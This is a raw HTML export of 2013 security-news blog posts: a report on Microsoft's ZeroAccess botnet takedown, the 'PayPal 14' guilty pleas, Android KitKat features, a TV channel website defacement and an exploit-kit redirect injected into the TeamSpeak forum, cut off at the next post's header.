<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHsqO5ApbcNgAc2R5AssJ3FVEp_gQsJMilyJZhpv3wC4JyoXH7NLc6tUALtLjy6drduMI20t3IcZElNQqiM7nfdYAemsRsi2eicBRn6Q1jmDIwo0PhxyqnjUGOOjOJrwvWvYjusMn4dSQ/s1600/microsoft-shattered-zerozccess-botnet.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHsqO5ApbcNgAc2R5AssJ3FVEp_gQsJMilyJZhpv3wC4JyoXH7NLc6tUALtLjy6drduMI20t3IcZElNQqiM7nfdYAemsRsi2eicBRn6Q1jmDIwo0PhxyqnjUGOOjOJrwvWvYjusMn4dSQ/s400/microsoft-shattered-zerozccess-botnet.jpg" width="400" /></a></div>
Redmond based software giant <a href="http://www.voiceofgreyhat.com/search/label/Microsoft">Microsoft</a> yet again got a huge success against a big racket of <a href="http://www.voiceofgreyhat.com/search?q=cyber+criminal">cyber criminals </a>while shattering one of the world's largest and most rampant <a href="http://www.voiceofgreyhat.com/search?q=botnet">botnets</a> named <b>'ZeroAccess'</b>. The <b>Sirefef botnet</b>, also known as ZeroAccess,<span style="color: red;"> is responsible for infecting more than 2 million computers</span>, specifically targeting search results on <a href="http://www.voiceofgreyhat.com/search?q=google">Google</a>, <a href="http://www.voiceofgreyhat.com/search?q=bing">Bing</a> and <a href="http://www.voiceofgreyhat.com/search?q=Yahoo">Yahoo</a> search engines, and is estimated to cost online advertisers <b>$2.7 million each month</b>. Tech giant <b>Microsoft</b> working alongside the <b><a href="http://www.voiceofgreyhat.com/search?q=FBI">Federal Bureau of Investigation (FBI)</a></b>, <b><a href="http://www.voiceofgreyhat.com/search?q=EC3">Europol's European Cybercrime Centre (EC3)</a></b> have successfully disrupted this <a href="http://www.voiceofgreyhat.com/search?q=botnet">notorious botnet</a>. This is Microsoft’s first botnet action since the Nov. 14 unveiling of its new <b>Cybercrime Center</b> — a center of excellence for advancing the global fight against cyber crime — and marks the company’s eighth botnet operation in the past three years. <br />
<div class="separator" style="clear: both; text-align: center;">
</div>
</div>
<div style="text-align: justify;">
<div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc-2FhdoSNTb7hBOgKxucsAIk42_Ru5GeTtkOWOOTbpERrxM6VQcmq15Wvd2LoUeSfbhCy84qFlC0zaW5LM68tQGVp-XR_9-21mdzy2E8BMrDs01BveC7NP6b-XBo1OaivilemhI2yci0/s1600/cybercrime-center-microsoft.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc-2FhdoSNTb7hBOgKxucsAIk42_Ru5GeTtkOWOOTbpERrxM6VQcmq15Wvd2LoUeSfbhCy84qFlC0zaW5LM68tQGVp-XR_9-21mdzy2E8BMrDs01BveC7NP6b-XBo1OaivilemhI2yci0/s400/cybercrime-center-microsoft.jpg" width="400" /></a><i></i><br />
<div style="text-align: justify;">
<i><i>“This operation marks an important step in coordinated actions that are initiated by private companies and, at the same time, enable law enforcement agencies around Europe to identify and investigate the criminal organizations and networks behind these dangerous botnets that use malicious software to gain illicit profits,” </i>said Troels Oerting, head of the EC3. <i>“EC3 added its expertise, information communications technology infrastructure and analytic capability, as well as provided the platform for high-level cooperation between cyber crime units in five European countries and Microsoft.”</i></i></div>
</div>
<div>
Due to its botnet architecture, ZeroAccess is one of the most robust and durable botnets in operation today and was built to be resilient to disruption efforts, relying on a peer-to-peer infrastructure that allows cyber criminals to remotely control the botnet from tens of thousands of different computers. ZeroAccess is used to commit a slew of crimes, including search hijacking, which “hijacks” people’s search results and redirects people to sites they had not intended or requested to go to in order to steal the money generated by their ad clicks. ZeroAccess also commits click fraud, which occurs when advertisers pay for clicks that are not the result of legitimate, interested human users’ clicks, but are the result of automated Web traffic and other criminal activity. Research by the University of California, San Diego shows that as of October 2013, 1.9 million computers were infected with ZeroAccess, and Microsoft determined there were <b>more than 800,000 ZeroAccess-infected computers active on the Internet </b>on any given day.<br />
<br /></div>
<iframe frameborder="0" height="360" src="http://www.youtube.com/embed/BFxgzjL-el0" width="640"></iframe><br />
<div>
<br /></div>
<div>
<b><u>How It Happened:- </u></b></div>
<div>
<div>
Last week, Microsoft filed a civil suit against the cyber criminals operating the ZeroAccess botnet and received authorization from the U.S. District Court for the Western District of Texas to simultaneously block incoming and outgoing communications between computers located in the U.S. and the 18 identified Internet Protocol (IP) addresses being used to commit the fraudulent schemes. In addition, Microsoft took over control of 49 domains associated with the ZeroAccess botnet. A10 Networks provided Microsoft with advanced technology to support the disruptive action.</div>
<div>
As Microsoft executed the order filed in its civil case, Europol coordinated a multijurisdictional criminal action targeting the 18 IP addresses located in Europe. Specifically, Europol worked with Latvia, Luxembourg, Switzerland, the Netherlands and Germany to execute search warrants and seizures on computer servers associated with the fraudulent IP addresses located in Europe. This is the second time in six months that Microsoft and law enforcement have worked together to successfully disrupt a prevalent botnet. It demonstrates the value coordinated operations have against cyber criminal enterprises. For more information about this botnet operation click <a href="http://www.microsoft.com/en-us/news/press/2013/dec13/12-05zeroaccessbotnetpr.aspx">here</a><br />
<br /></div>
</div>
<div>
ZeroAccess is counted as a very sophisticated malware, blocking attempts to remove it, therefore recommended for every Microsoft user to click <b><a href="http://support.microsoft.com/botnets">Here</a></b> for detailed instructions on how to remove this threat. As Microsoft found that the ZeroAccess malware disables security features on infected computers, leaving the computer susceptible to secondary infections, it is critical that victims rid their computers of ZeroAccess by using malware removal or antivirus software as quickly as possible. </div>
<div>
In conversation with press David Finn, executive director and associate general counsel of the Microsoft Digital Crimes Unit said -“Microsoft is committed to working collaboratively — with our customers, partners, academic experts and law enforcement — to combat cybercrime. And we’ll do everything we can to protect computer users from the sinister activities and criminal networks that victimize innocent people and businesses around the world.” </div>
<div>
<br /></div>
<div>
While talking about <a href="http://www.voiceofgreyhat.com/search?q=ZeroAccess">ZeroAccess botnet</a> take down, I would like to remind you that in Match, last year <a href="http://www.voiceofgreyhat.com/search?q=Microsoft">Microsoft</a> has successfully <a href="http://www.voiceofgreyhat.com/2012/03/microsoft-seized-two-command-control.html">shutdown</a> two <a href="http://www.voiceofgreyhat.com/search?q=C&C">command and control (C&C) server</a> of world's of the most dangerous banking trojan <b><a href="http://www.voiceofgreyhat.com/search?q=zeus">Zeus</a></b>.<br />
<br />
<div style="text-align: right;">
<span style="font-size: xx-small;">-Source (<a href="http://blogs.technet.com/b/microsoft_blog/archive/2013/12/05/microsoft-europol-fbi-and-industry-partners-disrupt-notorious-zeroaccess-botnet-that-hijacks-search-results.aspx">Microsoft Official Blog</a>)</span></div>
<div style="text-align: right;">
<span style="font-size: xx-small;"><br /></span></div>
</div>
</div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-72094972904937933102013-12-08T01:14:00.000+05:302013-12-08T01:14:22.366+05:30'PayPal 14' Culprits Enter Guilty Pleading Over Pro-WikiLeaks DDoS Attack Versus PayPal<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-size: large;">Accused <b>'PayPal 14'</b> Culprits of <b><span style="color: red;">Anonymous</span></b> Enter <b><span style="color: red;">Guilty Pleading</span></b> Over Pro-<b>WikiLeaks</b> <b><span style="color: red;">DDoS Attack</span></b> Versus <b>PayPal</b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMYgFyyuPBMx7s71Yq5GHZ7w-HLLvZP6cL6jtB5N70BmMEG2pTCtFbvu8okC0pJeDu4BYhbuufw5K8p3an7Co95zbLkDaUG0hHbhNv1ywkD7-FiuoQOoCvFACFOsIYAb5V0UComaWMUeU/s1600/PayPal14-ofanonymous-enter-guilty-ple.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMYgFyyuPBMx7s71Yq5GHZ7w-HLLvZP6cL6jtB5N70BmMEG2pTCtFbvu8okC0pJeDu4BYhbuufw5K8p3an7Co95zbLkDaUG0hHbhNv1ywkD7-FiuoQOoCvFACFOsIYAb5V0UComaWMUeU/s400/PayPal14-ofanonymous-enter-guilty-ple.jpg" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I am quite sure that all of your regular readers still remember the <a href="http://www.voiceofgreyhat.com/search?q=cyber+attack">devastating cyber attack</a> from <a href="http://www.voiceofgreyhat.com/search/label/anonymous">Anonymous </a>against <a href="http://www.voiceofgreyhat.com/search?q=paypal">PayPal</a>, the attack was conducted under the banner of <b><a href="http://www.voiceofgreyhat.com/search?q=Operation+PayPal">Operation PayPal (#OpPayPal)</a></b>. The infamous hacker community stated a reason for this mass protest as the online payment company suspending the account of <a href="http://www.voiceofgreyhat.com/search/label/wikileaks">WikiLeaks</a>. #OpPayPal is considered as one of the most <a href="http://www.voiceofgreyhat.com/2011/10/top-5-ddos-attacks-of-2011-exclusive.html">demolishing cyber attack</a> ever taken in <a href="http://www.voiceofgreyhat.com/search?q=cyber+space">cyber space</a>. PayPal with law enforcement agencies immediately taken steps and start investigation, in the primary step <a href="http://www.voiceofgreyhat.com/2011/08/paypal-sent-1000-ip-addresses-list-of.html">PayPal sent 1000 IP address</a> of Anonymous hacker who was linked on that attack to <a href="http://www.voiceofgreyhat.com/search?q=FBI">FBI</a>. As expected the hackers who were behind that <a href="http://www.voiceofgreyhat.com/search?q=attack">attack</a> was serially <a href="http://www.voiceofgreyhat.com/search?q=arrested">busted</a> by the police. And finally the <a href="http://www.voiceofgreyhat.com/search?q=accused+hacker">accused </a>anonymous hacker appeared in federal court in California on Thursday and will be formally <a href="http://www.voiceofgreyhat.com/search?q=sentenced">sentenced</a> in one year. Eleven of the so-called <b>“PayPal 14” </b>members each <a href="http://www.voiceofgreyhat.com/search?q=guilty">pleaded guilty</a> in court to one felony count of conspiracy and one misdemeanor count of damaging a computer as a result of their involvement in a <a href="http://www.voiceofgreyhat.com/search?q=DDoS">distributed denial-of-service (DDoS)</a> attack waged by <a href="http://www.voiceofgreyhat.com/search/label/anonymous">Anonymous</a> in late 2010 shortly after PayPal stopped processing donations to the anti-secrecy group WikiLeaks. Prosecutors say the defendants used a free computer program called the <b><a href="http://www.voiceofgreyhat.com/search?q=LOIC">Low Ion Orbit Cannon</a></b>, aka <b>LOIC</b>, to collectively flood PayPal’s servers with tremendous amounts of illegitimate internet traffic for one week that winter, at moments knocking the website offline as a result and causing what PayPal estimated to be<a href="http://www.voiceofgreyhat.com/2012/11/DDoS-Attack-From-Anonymous-Cost-PayPal-3.5-Million.html"> roughly £3.5 million in damages</a>. </div>
<div style="text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhziqnC7KcSe7tIdA_4fFwcRxsAex4pawY2Sob0Ind3ycuPyktXZ_j6x6BqUcG5rV1OMBZ0PLME1Uro-CIMAGzzK6-6OhzHhJQKungkU6TNKOu4ht2rb8IuMEbj0lqA1QgGDDTpmqvobW0/s1600/accused_PayPal_14.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhziqnC7KcSe7tIdA_4fFwcRxsAex4pawY2Sob0Ind3ycuPyktXZ_j6x6BqUcG5rV1OMBZ0PLME1Uro-CIMAGzzK6-6OhzHhJQKungkU6TNKOu4ht2rb8IuMEbj0lqA1QgGDDTpmqvobW0/s320/accused_PayPal_14.jpg" width="320" /></a>Pending good behavior, those 11 alleged Anons will be back in court early next December for sentencing, at<a href="http://www.voiceofgreyhat.com/search?q=guilty+pleading">pleading guilty</a> to the misdemeanor counts only, likely removing themselves from any lingering felony convictions but earning an eventual 90 day jail stint when they are finally sentenced. A fourth defendant, Dennis Owen Collins, did not attend the hearing due to complications involving a similar case currently being considered by a federal judge in Alexandria Virginia in which he and one dozen others are accused of conspiring to cripple other websites as an act of protest during roughly the same time.</div>
<div style="text-align: justify;">
which point the felony charges are expected to be adjourned. Two of the remaining defendants cut deals that found them. <span style="text-align: justify;">In his press reaction defense attorney Stanley Cohen said the terms of the settlement were reached following over a year of negotiations, </span><i style="text-align: justify;">“based upon strength, not weakness; based upon principle, not acquiescence.</i><span style="text-align: justify;">” In the courtroom all the accused hacker stood up and said, </span><i style="text-align: justify;">‘We did what you said we did . . .We believe it was an appropriate act from us and we’re willing to pay the price.’</i><span style="text-align: justify;"> </span></div>
<div style="text-align: justify;">
On the other hand Cohen, who represented PayPal 14 defendant Mercedes Haefer in court, said one of the hacktivists told him after Thursdays hearing concluded that <i>"This misdemeanor is a badge of honor and courage."</i> When media questioned Michael Whelan, a lawyer for one of the defendants, he declined to comment on the plea. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: right;">
<span style="font-size: xx-small;">-Source (<a href="http://rt.com/usa/paypal-hackers-court-anonymous-787/">RT</a>)</span></div>
<div style="text-align: right;">
<span style="font-size: xx-small;"><br /></span></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-54794873691498406742013-12-07T00:33:00.000+05:302013-12-07T00:33:19.556+05:30Android 4.4 'KitKat' -The More Compatible, Intelligent and Simple Android Ever<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-size: large;"><b><span style="color: lime;">Android 4.4 </span><span style="color: #660000;">'KitKat'</span></b> All You Need to Know-The More <b>Compatible</b>, <b>Intelligent</b> and <b>Simple</b> Android Ever </span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBX2rJhdn_Onje7redpC_DPmNaO7eNrCpr3PKLX4YpfvsRLntjvNAVaZPRyR7LjoJABbcHHgprylcopB4A7_XefZ-EHXeqXCFuaEQh8P_wLkB81iz2iVGIUnOjrCaL3ReujRFWCM3BYTM/s1600/Android+4.4+KitKat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="305" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBX2rJhdn_Onje7redpC_DPmNaO7eNrCpr3PKLX4YpfvsRLntjvNAVaZPRyR7LjoJABbcHHgprylcopB4A7_XefZ-EHXeqXCFuaEQh8P_wLkB81iz2iVGIUnOjrCaL3ReujRFWCM3BYTM/s400/Android+4.4+KitKat.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Earlier we have discussed several times on <a href="http://www.voiceofgreyhat.com/search?q=android">android</a>- which is one of the world's most popular and widely used operating system based on <a href="http://www.voiceofgreyhat.com/search?q=Linux+kernel">Linux kernel</a>, mainly designed for <a href="http://www.voiceofgreyhat.com/search?q=smartphone">smartphones</a> and <a href="http://www.voiceofgreyhat.com/search?q=tablet">tablet computers</a>. Since last four years we have got various flavor of android among them 2.2 (Froyo), 2.3.3–2.3.7 (<a href="http://www.voiceofgreyhat.com/search?q=Gingerbread">Gingerbread</a>), 3.2 (<a href="http://www.voiceofgreyhat.com/search?q=Honeycomb">Honeycomb</a>), 4.0.3–4.0.4 (<a href="http://www.voiceofgreyhat.com/search?q=IceCream+Sandwich">Ice Cream Sandwich</a>) & 4.1.x-4.3.x (<a href="http://www.voiceofgreyhat.com/search?q=Jelly+Bean">Jelly Bean</a>) successfully drawn public attention and gained popularity. After the success of Jelly Bean, now Google has introduced <b>Android 4.4 </b>nicknamed <b>'KitKat.'</b> Official website of android explained the reason of this nomenclature -<i>'as everyone finds chocolate so tempting, we decided to name the next version of Android after one of our favorite chocolate treats, the KitKat®!</i>' Immediately after this release android 4.4 is vogue as with this version of android Google improved performance and memory usage, makes this version more compatible than ever; you can easily try KitKat on your older smartphones. Now lets illuminate android 4.4 briefly-</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Introduction:-</b></div>
<div style="text-align: justify;">
Readers, I will introduce a simple way the new features of the version of android, "The KitKat" Accompanies the more intelligent and simple search for Android, says the official Google blog, and more importantly, Should Have compatibility with older devices. This means more people que can have access to the innovations than other Android updates.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Performance and improved use of memory:-</b></div>
<div style="text-align: justify;">
Many of the major changes are the KitKat under the hood. The overall performance should improve, especially in relation to RAM. The Android developers site says "KitKat streamlines all the key components to reduce memory consumption", so even older smartphones running Android 4.4 will be faster and more responsive - even with 512MB of RAM. The multitasking should work better and you can switch applications without lock your smartphone.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Simpler and more powerful: (Google Now)</b></div>
<div style="text-align: justify;">
The Google Now gained much prominence in KitKat, with quick, more cards, and more features without using their hands. Not too can wake up your smartphone to start a search and take a picture saying only "OK Google Now"? It's like Google Glass, but on your smartphone.</div>
<div style="text-align: justify;">
The Google Now will also gain space on your homescreen, if you want (and you can slide left to right to find it), and Google will add more cards to make your smartphone smarter automatically suferindo things based on your interests , location, and more.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Support SMS, location sharing, and animated GIFs in Hangouts:-</b></div>
<div style="text-align: justify;">
Google announced this week that Hangouts will turn the main messaging app - is text messaging, video calls and instant. If you hate having your conversations scattered in several different apps, with KitKat you need only Hangouts, which replaces the old Mail app.</div>
<div style="text-align: justify;">
The use of location sharing can be very convenient when you're meeting a friend and wants to tell exactly where it is.</div>
<div style="text-align: justify;">
Finally, if you like to put emojis in messages, are present in many new keyboard Google.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Improvements in NFC, Cloud Printing and File Management:-</b></div>
<div style="text-align: justify;">
The KitKat also includes improvements that developers can now use apps to improve their apps. Regarding the NFC, it may automatically take you to the right app when you touch your device into a payment terminal. Printer manufacturers can develop served to send print files from Android to your printer. And the new framework for access to storage provides a consistent way to access files stored in other facilities in other apps (eg, open or save files in Dropbox or Box when you're in the browser).</div>
<div style="text-align: justify;">
In short, I will whole heartily agree with Google while saying -KitKat 4.4 is Smart, simple, and truly yours To know more about <b>Android 4.4 'KitKat'</b> click <b><a href="http://www.android.com/versions/kit-kat-4-4/">here</a></b></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: justify;">
While concluding this article, I on behalf of <b><a href="http://www.voiceofgreyhat.com/">Team VOGH</a></b>, want to thank our new guest editor <b><a href="http://www.voiceofgreyhat.com/search?q=Rafael+Souza">Mr. Rafael Souza</a></b>, for sharing his view and extensive thought on android 4.4. Rafael we love you. </div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-35357617307989722032013-12-05T02:35:00.001+05:302013-12-05T02:35:26.073+05:30DY365 TV -Popular Satellite Channel of Assam, India Hacked<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-size: large;"><b><span style="color: red;">DY365 TV</span></b> -Popular <b>Satellite Channel</b> of <b>Assam</b>, India <b><span style="color: red;">Hacked </span></b>By <b><span style="color: red;">Dr41DeY </span></b>(Nigerian Cyber Army )</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUL2lJ51ExnhAJ0n6NNwm6fohSarTg3NtYVBb4vK-BOjJ2FsUL5z9xTNuV13PesYobmjLjR1GVnJKsVQ0Afaxl8rf9_JFiB94y8M7mQ6aFuYZ_oEFL2uxI6pqE9S6dyFGW62ImSev9xF0/s1600/Dy_365_TV_Hacked.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="257" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUL2lJ51ExnhAJ0n6NNwm6fohSarTg3NtYVBb4vK-BOjJ2FsUL5z9xTNuV13PesYobmjLjR1GVnJKsVQ0Afaxl8rf9_JFiB94y8M7mQ6aFuYZ_oEFL2uxI6pqE9S6dyFGW62ImSev9xF0/s400/Dy_365_TV_Hacked.png" width="400" /></a></div>
<div style="text-align: justify;">
<a href="http://www.voiceofgreyhat.com/search?q=hacker">Hacker</a> going by the alias name of <b><a href="http://www.voiceofgreyhat.com/search?q=Dr41DeY">Dr41DeY</a></b>, from a hackers community named Nigerian Cyber Army strikes again. After his much discussed hack of <a href="http://www.voiceofgreyhat.com/2013/12/pakistan-peoples-party-website-hacked.html">Pakistan People's Party (PPP)</a>, this time also he targeted what it called yet another high profile website of one of the leading 24-hour <a href="http://www.voiceofgreyhat.com/search?q=satellite+channel">satellite channel</a> of Assam, <a href="http://www.voiceofgreyhat.com/search?q=India">India </a>named <b><span style="color: red;">'DY365 TV.'</span></b> While talking with <a href="mailto:info@voiceofgreyhat.com">VOGH</a> representative the hacker confirmed that, manipulating some untold <a href="http://www.voiceofgreyhat.com/search/label/vulnerablity">vulnerability</a> he managed to gain administrative access into the <a href="http://dy365.in/"><b>official website</b></a> DY365 TV. But this time without tampering data, the hacker just left a <a href="http://www.voiceofgreyhat.com/search/label/defacement">message</a> on the home page saying <i>"Hacked By Dr41DeY @Nigerian Cyber Army."</i> Like earlier this time also Dr41DeY created an <a href="http://gyazo.com/43027d1a22b6cb2ba86ed0bf93a2ca02">image archive</a> as a proof of this hack. This <a href="http://www.voiceofgreyhat.com/search?q=cyber+attack">attack</a> taken place on the 3rd of December, and after couple of hours of hack, DY365 authorities have responded to the incident and restored their site, and also sources confirmed that the <a href="http://www.voiceofgreyhat.com/search?q=security+hole">security hole</a> has also been patched. Though this popular Assamese broadcasting channel refuses to give any statement regarding this issue. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b><u>Brief About DY365:-</u></b> It is a 24-hour satellite channel of Assam, India. DY365 broadcasts news in Assamese, Hindi, Bengali and English language. It was launched on October 30, 2008. DY365 is a unit of Brahmaputra Tele Productions Pvt. Ltd. Manoj Kumar Goswami is the editor-in-chief of the channel. The channel gained popularity is a very short span of time, and now it's recognized as one of the leading channel of North East India. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-20144257875572804992013-12-05T02:35:00.000+05:302013-12-05T02:35:24.066+05:30TeamSpeak Official Forum Hacked! Redirecting Users Into Malicious DotCache Exploit Kit<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-size: large;"><b>TeamSpeak</b> Official <b>Forum</b> <b><span style="color: red;">Hacked</span></b>! Infecting Users By <b>Malicious <span style="color: red;">DotCache Exploit Kit</span></b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKtQf2cA1wUHDi0nCpxlHkBHcQtDKf9CcDiQtfMs3u6lgIHHX-rnAb63Csiw5AsgYDF1QVasWFMDQAnKMoagtUTVYWTNnvkOu3vcL1Akgv5-MdwNFwgJwHxvx3shckzmkgfeEDdRIifbo/s1600/TeamSpeak-forum-hacked-malware-infected.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="378" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKtQf2cA1wUHDi0nCpxlHkBHcQtDKf9CcDiQtfMs3u6lgIHHX-rnAb63Csiw5AsgYDF1QVasWFMDQAnKMoagtUTVYWTNnvkOu3vcL1Akgv5-MdwNFwgJwHxvx3shckzmkgfeEDdRIifbo/s400/TeamSpeak-forum-hacked-malware-infected.png" width="400" /></a></div>
<div style="text-align: justify;">
A serious <a href="http://www.voiceofgreyhat.com/search?q=security+breach">security breach</a> has compromised official forum of <b><a href="http://www.teamspeak.com/">TeamSpeak</a></b>, according to sources <a href="http://www.voiceofgreyhat.com/search?q=hackers">hackers </a>have gained access inside the server and injected <a href="http://www.voiceofgreyhat.com/search?q=malicious+script">malicious script</a> into the landing page of <a href="http://forum.teamspeak.com/">TeamSpeak official forum</a>. Expert <a href="http://www.voiceofgreyhat.com/search?q=malware">malware</a> analyzer have figured out that the attack was thoroughly planned in order to infect millions of users while redirecting them to a <b><span style="color: red;">DotCache exploit kit</span></b> landing page as illustrated below </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqEZS2j_yF67SM8llUmx9mCRBHe18JlHBbZOvtBXK7Kp3Grc-Og-a4EuEShmGf7UlH2LbeL_FjDpxlVQ43M7JJJM9bNgdYJ-tAI-DMXceeirZXeey7_eDdamOYOqojJZJ4CLz4wafp8sU/s1600/TeamSpeak_hacked_malware_injected.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqEZS2j_yF67SM8llUmx9mCRBHe18JlHBbZOvtBXK7Kp3Grc-Og-a4EuEShmGf7UlH2LbeL_FjDpxlVQ43M7JJJM9bNgdYJ-tAI-DMXceeirZXeey7_eDdamOYOqojJZJ4CLz4wafp8sU/s320/TeamSpeak_hacked_malware_injected.png" width="320" /></a></div>
<div style="text-align: justify;">
TeamSpeak is a very famous Brazilian company who offers <a href="http://www.voiceofgreyhat.com/search?q=voip">(VoIP)</a> software that allows computer users to speak on a chat channel with fellow computer users, much like a telephone conference call. Users use the TeamSpeak client software to connect to a TeamSpeak server of their choice, from there they can join chat channels and enjoy the excellent VoIP service. Mostly it is used by millions of gamers across the globe. </div>
<div style="text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0nv1domNInuZLxM6wzIMfNtEfkJqMnn_b0LiX6xajqcLuPYkyOMIe9BWfGrycba6Q1UuXOjLZj6r4KcI1Drx77BBYhAdwPbJEe-vT-d3BO2r8HrWfl0CwmI6TXoBhyphenhyphenlMFYNVQeDKJgUU/s1600/TeamSpeak_hacked_malware_injected1.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0nv1domNInuZLxM6wzIMfNtEfkJqMnn_b0LiX6xajqcLuPYkyOMIe9BWfGrycba6Q1UuXOjLZj6r4KcI1Drx77BBYhAdwPbJEe-vT-d3BO2r8HrWfl0CwmI6TXoBhyphenhyphenlMFYNVQeDKJgUU/s320/TeamSpeak_hacked_malware_injected1.png" width="320" /></a>Basically we can consider TeamSpeak is a high value target, so did the hacker. Researchers said that the <a href="http://www.voiceofgreyhat.com/search?q=exploit">exploit</a> kit landing page is hosted on <span style="color: red;">atvisti.ro</span>, a forum for ATV enthusiasts that's also been compromised. In a statement well known malware analyst & security researcher Jerome Segura said- if the <a href="http://www.voiceofgreyhat.com/search?q=java+exploit">Java exploit</a> succeeds the final <a href="http://www.voiceofgreyhat.com/search?q=payload">payload</a> is loaded. In this particular example, the payload was the <b><span style="color: red;">Zero Access Troja</span></b>n which an Anti-Malware from Malwarebytes detects as <b><span style="color: red;">Rootkit.0Access</span></b>. The matter of a bit relief is that the malware has not yet been spotted in the wild. According to a statistic by <a href="https://www.virustotal.com/en/file/bb559ecbfb0f2f0ad85fd8ed120e28c1858d6fce92d5bd627a86858860a9858a/analysis/1385492895/">Virus Total</a>, only 7 of 46 leading antivirus can detect this type of malware. Exactly like TeamSpeak, a few days earlier <a href="http://www.kahusecurity.com/2013/jjencode-script-leads-to-drive-by/">Kahu Security</a> researchers uncovered a similar compromise on the forum for the Nissan Pathfinder Off Road Association <a href="http://www.nissanpathfinders.net/">(NPORA)</a> in both cases, <b><a href="http://utf-8.jp/public/jjencode.html">JJEncode</a></b> was used to obfuscate the malicious script. To avoid further infection, TeamSpeak forum has already been informed, an as expected they have over come this issue. For detail analysis of the above said <a href="http://www.voiceofgreyhat.com/search?q=malware">malware</a> you can visit official blog post of <a href="http://blog.malwarebytes.org/exploits-2/2013/11/teamspeaks-brazilian-forum-compromised-redirects-to-malware/">Malwarebytes</a>. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-27360821902090136342013-12-02T01:05:00.000+05:302013-12-02T01:14:47.040+05:30Pakistan People's Party Official Website Hacked By Dr41DeY (Nigerian Cyber Army)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-size: large;"><b><span style="color: red;">Pakistan People's Party (PPP)</span></b> Official Website <b>Hacked </b>By <b><span style="color: red;">Dr41DeY</span></b> <b>(Nigerian Cyber Army)</b></span></div>
<div class="separator" style="clear: both; text-align: center;">
